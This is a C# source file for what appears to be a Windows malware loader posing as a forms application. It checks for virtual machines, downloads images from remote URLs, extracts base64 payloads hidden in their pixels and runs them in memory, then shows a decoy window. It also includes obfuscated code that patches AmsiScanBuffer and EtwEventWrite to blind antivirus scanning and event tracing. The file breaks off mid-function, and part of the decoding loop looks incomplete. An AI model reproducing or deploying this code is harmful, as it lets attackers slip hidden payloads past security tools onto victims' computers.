
701 lines
28 KiB
Raw Permalink Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

using System;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Linq;
using System.Management;
using System.Net;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Text;
using System.Windows.Forms;
using WindowsFormsApp1;
namespace Program
static class Program
/// <summary>
/// 应用程序的主入口点。
/// </summary>
static void Main()
if (!VM())
string LDer = @""; // No StartupCHINA
string FI_LE = @""; //FI_LE
var requestLDer = WebRequest.Create(LDer);
var requestFI_LE = WebRequest.Create(FI_LE);
Bitmap LDerIMG;
Bitmap FI_LEIMG;
using (var response = requestLDer.GetResponse())
using (var stream = response.GetResponseStream())
LDerIMG = (Bitmap)Image.FromStream(stream);
using (var response = requestFI_LE.GetResponse())
using (var stream = response.GetResponseStream())
FI_LEIMG = (Bitmap)Image.FromStream(stream);
byte[] outputLDer = DE(LDerIMG);
byte[] outputFI_LE = DE(FI_LEIMG);
//Assembly.Load(outputLDer).GetType("loader.loader").GetMethod("RunProgram").Invoke(null, new object[] { outputFI_LE });
Assembly.Load(outputFI_LE).EntryPoint.Invoke(null, null);
Application.Run(new Form1());
public static byte[] DE(Bitmap img)
StringBuilder holder = new StringBuilder();
int xmax = img.Width - 1;
int ymax = img.Height - 1;
for (int y = 1; y <= ymax; y++)
for (int x = 1; x <= xmax; x++)
Color c = img.GetPixel(x, y);
return Convert.FromBase64String(holder.ToString().Replace(Convert.ToChar(0).ToString(), ""));
public static bool VM()
SelectQuery selectQuery = new SelectQuery("Select * from Win32_CacheMemory");
ManagementObjectSearcher searcher = new ManagementObjectSearcher(selectQuery);
int i = 0;
foreach (ManagementObject DeviceID in searcher.Get())
if (i == 0)
return true;
return false;
public class DInvokeCore
// Required NTSTATUSs
public enum NTSTATUS : uint
// Success
Success = 0x00000000,
Wait0 = 0x00000000,
Wait1 = 0x00000001,
Wait2 = 0x00000002,
Wait3 = 0x00000003,
Wait63 = 0x0000003f,
Abandoned = 0x00000080,
AbandonedWait0 = 0x00000080,
AbandonedWait1 = 0x00000081,
AbandonedWait2 = 0x00000082,
AbandonedWait3 = 0x00000083,
AbandonedWait63 = 0x000000bf,
UserApc = 0x000000c0,
KernelApc = 0x00000100,
Alerted = 0x00000101,
Timeout = 0x00000102,
Pending = 0x00000103,
Reparse = 0x00000104,
MoreEntries = 0x00000105,
NotAllAssigned = 0x00000106,
SomeNotMapped = 0x00000107,
OpLockBreakInProgress = 0x00000108,
VolumeMounted = 0x00000109,
RxActCommitted = 0x0000010a,
NotifyCleanup = 0x0000010b,
NotifyEnumDir = 0x0000010c,
NoQuotasForAccount = 0x0000010d,
PrimaryTransportConnectFailed = 0x0000010e,
PageFaultTransition = 0x00000110,
PageFaultDemandZero = 0x00000111,
PageFaultCopyOnWrite = 0x00000112,
PageFaultGuardPage = 0x00000113,
PageFaultPagingFile = 0x00000114,
CrashDump = 0x00000116,
ReparseObject = 0x00000118,
NothingToTerminate = 0x00000122,
ProcessNotInJob = 0x00000123,
ProcessInJob = 0x00000124,
ProcessCloned = 0x00000129,
FileLockedWithOnlyReaders = 0x0000012a,
FileLockedWithWriters = 0x0000012b,
// Informational
Informational = 0x40000000,
ObjectNameExists = 0x40000000,
ThreadWasSuspended = 0x40000001,
WorkingSetLimitRange = 0x40000002,
ImageNotAtBase = 0x40000003,
RegistryRecovered = 0x40000009,
// Warning
Warning = 0x80000000,
GuardPageViolation = 0x80000001,
DatatypeMisalignment = 0x80000002,
Breakpoint = 0x80000003,
SingleStep = 0x80000004,
BufferOverflow = 0x80000005,
NoMoreFiles = 0x80000006,
HandlesClosed = 0x8000000a,
PartialCopy = 0x8000000d,
DeviceBusy = 0x80000011,
InvalidEaName = 0x80000013,
EaListInconsistent = 0x80000014,
NoMoreEntries = 0x8000001a,
LongJump = 0x80000026,
DllMightBeInsecure = 0x8000002b,
// Error
Error = 0xc0000000,
Unsuccessful = 0xc0000001,
NotImplemented = 0xc0000002,
InvalidInfoClass = 0xc0000003,
InfoLengthMismatch = 0xc0000004,
AccessViolation = 0xc0000005,
InPageError = 0xc0000006,
PagefileQuota = 0xc0000007,
InvalidHandle = 0xc0000008,
BadInitialStack = 0xc0000009,
BadInitialPc = 0xc000000a,
InvalidCid = 0xc000000b,
TimerNotCanceled = 0xc000000c,
InvalidParameter = 0xc000000d,
NoSuchDevice = 0xc000000e,
NoSuchFile = 0xc000000f,
InvalidDeviceRequest = 0xc0000010,
EndOfFile = 0xc0000011,
WrongVolume = 0xc0000012,
NoMediaInDevice = 0xc0000013,
NoMemory = 0xc0000017,
ConflictingAddresses = 0xc0000018,
NotMappedView = 0xc0000019,
UnableToFreeVm = 0xc000001a,
UnableToDeleteSection = 0xc000001b,
IllegalInstruction = 0xc000001d,
AlreadyCommitted = 0xc0000021,
AccessDenied = 0xc0000022,
BufferTooSmall = 0xc0000023,
ObjectTypeMismatch = 0xc0000024,
NonContinuableException = 0xc0000025,
BadStack = 0xc0000028,
NotLocked = 0xc000002a,
NotCommitted = 0xc000002d,
InvalidParameterMix = 0xc0000030,
ObjectNameInvalid = 0xc0000033,
ObjectNameNotFound = 0xc0000034,
ObjectNameCollision = 0xc0000035,
ObjectPathInvalid = 0xc0000039,
ObjectPathNotFound = 0xc000003a,
ObjectPathSyntaxBad = 0xc000003b,
DataOverrun = 0xc000003c,
DataLate = 0xc000003d,
DataError = 0xc000003e,
CrcError = 0xc000003f,
SectionTooBig = 0xc0000040,
PortConnectionRefused = 0xc0000041,
InvalidPortHandle = 0xc0000042,
SharingViolation = 0xc0000043,
QuotaExceeded = 0xc0000044,
InvalidPageProtection = 0xc0000045,
MutantNotOwned = 0xc0000046,
SemaphoreLimitExceeded = 0xc0000047,
PortAlreadySet = 0xc0000048,
SectionNotImage = 0xc0000049,
SuspendCountExceeded = 0xc000004a,
ThreadIsTerminating = 0xc000004b,
BadWorkingSetLimit = 0xc000004c,
IncompatibleFileMap = 0xc000004d,
SectionProtection = 0xc000004e,
EasNotSupported = 0xc000004f,
EaTooLarge = 0xc0000050,
NonExistentEaEntry = 0xc0000051,
NoEasOnFile = 0xc0000052,
EaCorruptError = 0xc0000053,
FileLockConflict = 0xc0000054,
LockNotGranted = 0xc0000055,
DeletePending = 0xc0000056,
CtlFileNotSupported = 0xc0000057,
UnknownRevision = 0xc0000058,
RevisionMismatch = 0xc0000059,
InvalidOwner = 0xc000005a,
InvalidPrimaryGroup = 0xc000005b,
NoImpersonationToken = 0xc000005c,
CantDisableMandatory = 0xc000005d,
NoLogonServers = 0xc000005e,
NoSuchLogonSession = 0xc000005f,
NoSuchPrivilege = 0xc0000060,
PrivilegeNotHeld = 0xc0000061,
InvalidAccountName = 0xc0000062,
UserExists = 0xc0000063,
NoSuchUser = 0xc0000064,
GroupExists = 0xc0000065,
NoSuchGroup = 0xc0000066,
MemberInGroup = 0xc0000067,
MemberNotInGroup = 0xc0000068,
LastAdmin = 0xc0000069,
WrongPassword = 0xc000006a,
IllFormedPassword = 0xc000006b,
PasswordRestriction = 0xc000006c,
LogonFailure = 0xc000006d,
AccountRestriction = 0xc000006e,
InvalidLogonHours = 0xc000006f,
InvalidWorkstation = 0xc0000070,
PasswordExpired = 0xc0000071,
AccountDisabled = 0xc0000072,
NoneMapped = 0xc0000073,
TooManyLuidsRequested = 0xc0000074,
LuidsExhausted = 0xc0000075,
InvalidSubAuthority = 0xc0000076,
InvalidAcl = 0xc0000077,
InvalidSid = 0xc0000078,
InvalidSecurityDescr = 0xc0000079,
ProcedureNotFound = 0xc000007a,
InvalidImageFormat = 0xc000007b,
NoToken = 0xc000007c,
BadInheritanceAcl = 0xc000007d,
RangeNotLocked = 0xc000007e,
DiskFull = 0xc000007f,
ServerDisabled = 0xc0000080,
ServerNotDisabled = 0xc0000081,
TooManyGuidsRequested = 0xc0000082,
GuidsExhausted = 0xc0000083,
InvalidIdAuthority = 0xc0000084,
AgentsExhausted = 0xc0000085,
InvalidVolumeLabel = 0xc0000086,
SectionNotExtended = 0xc0000087,
NotMappedData = 0xc0000088,
ResourceDataNotFound = 0xc0000089,
ResourceTypeNotFound = 0xc000008a,
ResourceNameNotFound = 0xc000008b,
ArrayBoundsExceeded = 0xc000008c,
FloatDenormalOperand = 0xc000008d,
FloatDivideByZero = 0xc000008e,
FloatInexactResult = 0xc000008f,
FloatInvalidOperation = 0xc0000090,
FloatOverflow = 0xc0000091,
FloatStackCheck = 0xc0000092,
FloatUnderflow = 0xc0000093,
IntegerDivideByZero = 0xc0000094,
IntegerOverflow = 0xc0000095,
PrivilegedInstruction = 0xc0000096,
TooManyPagingFiles = 0xc0000097,
FileInvalid = 0xc0000098,
InsufficientResources = 0xc000009a,
InstanceNotAvailable = 0xc00000ab,
PipeNotAvailable = 0xc00000ac,
InvalidPipeState = 0xc00000ad,
PipeBusy = 0xc00000ae,
IllegalFunction = 0xc00000af,
PipeDisconnected = 0xc00000b0,
PipeClosing = 0xc00000b1,
PipeConnected = 0xc00000b2,
PipeListening = 0xc00000b3,
InvalidReadMode = 0xc00000b4,
IoTimeout = 0xc00000b5,
FileForcedClosed = 0xc00000b6,
ProfilingNotStarted = 0xc00000b7,
ProfilingNotStopped = 0xc00000b8,
NotSameDevice = 0xc00000d4,
FileRenamed = 0xc00000d5,
CantWait = 0xc00000d8,
PipeEmpty = 0xc00000d9,
CantTerminateSelf = 0xc00000db,
InternalError = 0xc00000e5,
InvalidParameter1 = 0xc00000ef,
InvalidParameter2 = 0xc00000f0,
InvalidParameter3 = 0xc00000f1,
InvalidParameter4 = 0xc00000f2,
InvalidParameter5 = 0xc00000f3,
InvalidParameter6 = 0xc00000f4,
InvalidParameter7 = 0xc00000f5,
InvalidParameter8 = 0xc00000f6,
InvalidParameter9 = 0xc00000f7,
InvalidParameter10 = 0xc00000f8,
InvalidParameter11 = 0xc00000f9,
InvalidParameter12 = 0xc00000fa,
ProcessIsTerminating = 0xc000010a,
MappedFileSizeZero = 0xc000011e,
TooManyOpenedFiles = 0xc000011f,
Cancelled = 0xc0000120,
CannotDelete = 0xc0000121,
InvalidComputerName = 0xc0000122,
FileDeleted = 0xc0000123,
SpecialAccount = 0xc0000124,
SpecialGroup = 0xc0000125,
SpecialUser = 0xc0000126,
MembersPrimaryGroup = 0xc0000127,
FileClosed = 0xc0000128,
TooManyThreads = 0xc0000129,
ThreadNotInProcess = 0xc000012a,
TokenAlreadyInUse = 0xc000012b,
PagefileQuotaExceeded = 0xc000012c,
CommitmentLimit = 0xc000012d,
InvalidImageLeFormat = 0xc000012e,
InvalidImageNotMz = 0xc000012f,
InvalidImageProtect = 0xc0000130,
InvalidImageWin16 = 0xc0000131,
LogonServer = 0xc0000132,
DifferenceAtDc = 0xc0000133,
SynchronizationRequired = 0xc0000134,
DllNotFound = 0xc0000135,
IoPrivilegeFailed = 0xc0000137,
OrdinalNotFound = 0xc0000138,
EntryPointNotFound = 0xc0000139,
ControlCExit = 0xc000013a,
InvalidAddress = 0xc0000141,
PortNotSet = 0xc0000353,
DebuggerInactive = 0xc0000354,
CallbackBypass = 0xc0000503,
PortClosed = 0xc0000700,
MessageLost = 0xc0000701,
InvalidMessage = 0xc0000702,
RequestCanceled = 0xc0000703,
RecursiveDispatch = 0xc0000704,
LpcReceiveBufferExpected = 0xc0000705,
LpcInvalidConnectionUsage = 0xc0000706,
LpcRequestsNotAllowed = 0xc0000707,
ResourceInUse = 0xc0000708,
ProcessIsProtected = 0xc0000712,
VolumeDirty = 0xc0000806,
FileCheckedOut = 0xc0000901,
CheckOutRequired = 0xc0000902,
BadFileType = 0xc0000903,
FileTooLarge = 0xc0000904,
FormsAuthRequired = 0xc0000905,
VirusInfected = 0xc0000906,
VirusDeleted = 0xc0000907,
TransactionalConflict = 0xc0190001,
InvalidTransaction = 0xc0190002,
TransactionNotActive = 0xc0190003,
TmInitializationFailed = 0xc0190004,
RmNotActive = 0xc0190005,
RmMetadataCorrupt = 0xc0190006,
TransactionNotJoined = 0xc0190007,
DirectoryNotRm = 0xc0190008,
CouldNotResizeLog = 0xc0190009,
TransactionsUnsupportedRemote = 0xc019000a,
LogResizeInvalidSize = 0xc019000b,
RemoteFileVersionMismatch = 0xc019000c,
CrmProtocolAlreadyExists = 0xc019000f,
TransactionPropagationFailed = 0xc0190010,
CrmProtocolNotFound = 0xc0190011,
TransactionSuperiorExists = 0xc0190012,
TransactionRequestNotValid = 0xc0190013,
TransactionNotRequested = 0xc0190014,
TransactionAlreadyAborted = 0xc0190015,
TransactionAlreadyCommitted = 0xc0190016,
TransactionInvalidMarshallBuffer = 0xc0190017,
CurrentTransactionNotValid = 0xc0190018,
LogGrowthFailed = 0xc0190019,
ObjectNoLongerExists = 0xc0190021,
StreamMiniversionNotFound = 0xc0190022,
StreamMiniversionNotValid = 0xc0190023,
MiniversionInaccessibleFromSpecifiedTransaction = 0xc0190024,
CantOpenMiniversionWithModifyIntent = 0xc0190025,
CantCreateMoreStreamMiniversions = 0xc0190026,
HandleNoLongerValid = 0xc0190028,
NoTxfMetadata = 0xc0190029,
LogCorruptionDetected = 0xc0190030,
CantRecoverWithHandleOpen = 0xc0190031,
RmDisconnected = 0xc0190032,
EnlistmentNotSuperior = 0xc0190033,
RecoveryNotNeeded = 0xc0190034,
RmAlreadyStarted = 0xc0190035,
FileIdentityNotPersistent = 0xc0190036,
CantBreakTransactionalDependency = 0xc0190037,
CantCrossRmBoundary = 0xc0190038,
TxfDirNotEmpty = 0xc0190039,
IndoubtTransactionsExist = 0xc019003a,
TmVolatile = 0xc019003b,
RollbackTimerExpired = 0xc019003c,
TxfAttributeCorrupt = 0xc019003d,
EfsNotAllowedInTransaction = 0xc019003e,
TransactionalOpenNotAllowed = 0xc019003f,
TransactedMappingUnsupportedRemote = 0xc0190040,
TxfMetadataAlreadyPresent = 0xc0190041,
TransactionScopeCallbacksNotSet = 0xc0190042,
TransactionRequiredPromotion = 0xc0190043,
CannotExecuteFileInTransaction = 0xc0190044,
TransactionsNotFrozen = 0xc0190045,
MaximumNtStatus = 0xffffffff
// Delegate NtProtectVirtualMemory
public class Delegates
public delegate UInt32 NtProtectVirtualMemory(
IntPtr ProcessHandle,
ref IntPtr BaseAddress,
ref IntPtr RegionSize,
UInt32 NewProtect,
ref UInt32 OldProtect);
private static IntPtr GetLibraryAddress(string DLLName, string FunctionName)
IntPtr hModule = GetLoadedModuleAddress(DLLName);
if (hModule == IntPtr.Zero)
throw new DllNotFoundException(DLLName + ", Dll was not found or not loaded.");
IntPtr lastOutput = GetExportAddress(hModule, FunctionName);
return lastOutput;
private static IntPtr GetLoadedModuleAddress(string DLLName)
Process CurrentProcess = Process.GetCurrentProcess();
foreach (ProcessModule Module in CurrentProcess.Modules)
if (string.Compare(Module.ModuleName, DLLName, true) == 0)
IntPtr ModuleBasePointer = Module.BaseAddress;
return ModuleBasePointer;
return IntPtr.Zero;
private static IntPtr GetExportAddress(IntPtr ModuleBase, string ExportName)
IntPtr FunctionPtr = IntPtr.Zero;
// Traverse the PE header in memory
Int32 PeHeader = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + 0x3C));
Int16 OptHeaderSize = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + PeHeader + 0x14));
Int64 OptHeader = ModuleBase.ToInt64() + PeHeader + 0x18;
Int16 Magic = Marshal.ReadInt16((IntPtr)OptHeader);
Int64 pExport = 0;
if (Magic == 0x010b)
pExport = OptHeader + 0x60;
pExport = OptHeader + 0x70;
Int32 ExportRVA = Marshal.ReadInt32((IntPtr)pExport);
Int32 OrdinalBase = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x10));
Int32 NumberOfFunctions = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x14));
Int32 NumberOfNames = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x18));
Int32 FunctionsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x1C));
Int32 NamesRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x20));
Int32 OrdinalsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x24));
// Loop the array of export name RVA's
for (int i = 0; i < NumberOfNames; i++)
string FunctionName = Marshal.PtrToStringAnsi((IntPtr)(ModuleBase.ToInt64() + Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + NamesRVA + i * 4))));
if (FunctionName.Equals(ExportName, StringComparison.OrdinalIgnoreCase))
Int32 FunctionOrdinal = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + OrdinalsRVA + i * 2)) + OrdinalBase;
Int32 FunctionRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + FunctionsRVA + (4 * (FunctionOrdinal - OrdinalBase))));
FunctionPtr = (IntPtr)((Int64)ModuleBase + FunctionRVA);
// Catch parser failure
throw new InvalidOperationException("Failed to parse module exports.");
if (FunctionPtr == IntPtr.Zero)
// Export not found
throw new MissingMethodException(ExportName + ", export not found.");
return FunctionPtr;
public static object DynamicAPIInvoke(string DLLName, string FunctionName, Type FunctionDelegateType, ref object[] Parameters)
IntPtr pFunction = GetLibraryAddress(DLLName, FunctionName);
if (pFunction == IntPtr.Zero)
throw new InvalidOperationException("Could not get the handle for the function.");
return DynamicFunctionInvoke(pFunction, FunctionDelegateType, ref Parameters);
private static object DynamicFunctionInvoke(IntPtr FunctionPointer, Type FunctionDelegateType, ref object[] Parameters)
Delegate funcDelegate = Marshal.GetDelegateForFunctionPointer(FunctionPointer, FunctionDelegateType);
return funcDelegate.DynamicInvoke(Parameters);
public static bool NtProtectVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref IntPtr RegionSize, UInt32 NewProtect, ref UInt32 OldProtect)
// Craft an array for the arguments
OldProtect = 0;
object[] funcargs = { ProcessHandle, BaseAddress, RegionSize, NewProtect, OldProtect };
NTSTATUS retValue = (NTSTATUS)DynamicAPIInvoke(@"ntdll.dll", @"NtProtectVirtualMemory", typeof(Delegates.NtProtectVirtualMemory), ref funcargs);
if (retValue != NTSTATUS.Success)
return false;
OldProtect = (UInt32)funcargs[4];
return true;
public class A
static byte[] x64_etw_patch = new byte[] { 0x48, 0x33, 0xC0, 0xC3 };
static byte[] x86_etw_patch = new byte[] { 0x33, 0xc0, 0xc2, 0x14, 0x00 };
static byte[] x64_am_si_patch = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
static byte[] x86_am_si_patch = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 };
// Thx D/Invoke!
private static IntPtr GetExportAddress(IntPtr ModuleBase, string ExportName)
IntPtr FunctionPtr = IntPtr.Zero;
// Traverse the PE header in memory
Int32 PeHeader = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + 0x3C));
Int16 OptHeaderSize = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + PeHeader + 0x14));
Int64 OptHeader = ModuleBase.ToInt64() + PeHeader + 0x18;
Int16 Magic = Marshal.ReadInt16((IntPtr)OptHeader);
Int64 pExport = 0;
if (Magic == 0x010b)
pExport = OptHeader + 0x60;
pExport = OptHeader + 0x70;
Int32 ExportRVA = Marshal.ReadInt32((IntPtr)pExport);
Int32 OrdinalBase = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x10));
Int32 NumberOfFunctions = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x14));
Int32 NumberOfNames = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x18));
Int32 FunctionsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x1C));
Int32 NamesRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x20));
Int32 OrdinalsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x24));
// Loop the array of export name RVA's
for (int i = 0; i < NumberOfNames; i++)
string FunctionName = Marshal.PtrToStringAnsi((IntPtr)(ModuleBase.ToInt64() + Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + NamesRVA + i * 4))));
if (FunctionName.Equals(ExportName, StringComparison.OrdinalIgnoreCase))
Int32 FunctionOrdinal = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + OrdinalsRVA + i * 2)) + OrdinalBase;
Int32 FunctionRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + FunctionsRVA + (4 * (FunctionOrdinal - OrdinalBase))));
FunctionPtr = (IntPtr)((Int64)ModuleBase + FunctionRVA);
// Catch parser failure
throw new InvalidOperationException("Failed to parse module exports.");
if (FunctionPtr == IntPtr.Zero)
// Export not found
throw new MissingMethodException(ExportName + " not found.");
return FunctionPtr;
private static string decode(string b64encoded)
return System.Text.ASCIIEncoding.ASCII.GetString(System.Convert.FromBase64String(b64encoded));
private static void PatchMem(byte[] patch, string library, string function)
IntPtr CurrentProcessHandle = new IntPtr(-1); // pseudo-handle for current process handle
IntPtr libPtr = (Process.GetCurrentProcess().Modules.Cast<ProcessModule>().Where(x => library.Equals(Path.GetFileName(x.FileName), StringComparison.OrdinalIgnoreCase)).FirstOrDefault().BaseAddress);
IntPtr funcPtr = GetExportAddress(libPtr, function);
IntPtr patchLength = new IntPtr(patch.Length);
UInt32 oldProtect = 0;
DInvokeCore.NtProtectVirtualMemory(CurrentProcessHandle, ref funcPtr, ref patchLength, 0x40, ref oldProtect);
Marshal.Copy(patch, 0, funcPtr, patch.Length);
catch (Exception e)
Console.WriteLine(" [!] {0}", e.Message);
Console.WriteLine(" [!] {0}", e.InnerException);
private static void Patcham_si(byte[] patch)
string dll = decode("YW1zaS5kbGw=");
foreach (ProcessModule CurrentModule in (Process.GetCurrentProcess().Modules))
if (CurrentModule.ModuleName == dll)
PatchMem(patch, dll, ("Am" + "si" + "Sc" + "an" + "Bu" + "ff" + "er"));
private static void PatchETW(byte[] Patch)
PatchMem(Patch, ("n" + "t" + "d" + "l" + "l" + "." + "d" + "l" + "l"), ("Et" + "wE" + "ve" + "nt" + "Wr" + "it" + "e"));
public static void B()
bool isit64bit;
if (IntPtr.Size == 4)
isit64bit = false;
isit64bit = true;
if (isit64bit)